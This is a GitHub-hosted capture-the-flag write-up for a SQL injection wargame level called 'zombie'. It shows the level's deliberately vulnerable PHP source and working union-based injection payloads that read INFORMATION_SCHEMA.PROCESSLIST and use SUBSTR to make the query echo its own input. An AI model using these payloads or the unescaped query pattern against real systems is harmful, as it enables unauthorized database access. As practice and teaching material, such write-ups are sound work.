-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy path31_zombie.txt
35 lines (26 loc) · 1.31 KB
/
31_zombie.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
https://dev.mysql.com/doc/refman/5.7/en/information-schema-processlist-table.html
quine hack :)
ZOMBIE Clear!
<?php
include "./config.php";
login_chk();
$db = dbconnect("zombie");
if(preg_match('/rollup|join|ace|@/i', $_GET['pw'])) exit("No Hack ~_~");
$query = "select pw from prob_zombie where pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['pw']) echo "<h2>Pw : {$result[pw]}</h2>";
if(($result['pw']) && ($result['pw'] === $_GET['pw'])) solve("zombie");
highlight_file(__FILE__);
?>
1. Check if we can query processlist table:
query: x' union SELECT info FROM INFORMATION_SCHEMA.PROCESSLIST;%23
response:
Pw : select pw from prob_zombie where pw='x' union SELECT info FROM INFORMATION_SCHEMA.PROCESSLIST;#'
So, we cut the text:
length: 72
|--------------------------------------------------------|
select pw from prob_zombie where pw='x' union SELECT info FROM INFORMATION_SCHEMA.PROCESSLIST;#'
Prepare the payload:
query : select pw from prob_zombie where pw='x' union SELECT SUBSTR(info,38,72) FROM INFORMATION_SCHEMA.PROCESSLIST;#'
Pw : x' union SELECT SUBSTR(info,38,72) FROM INFORMATION_SCHEMA.PROCESSLIST;#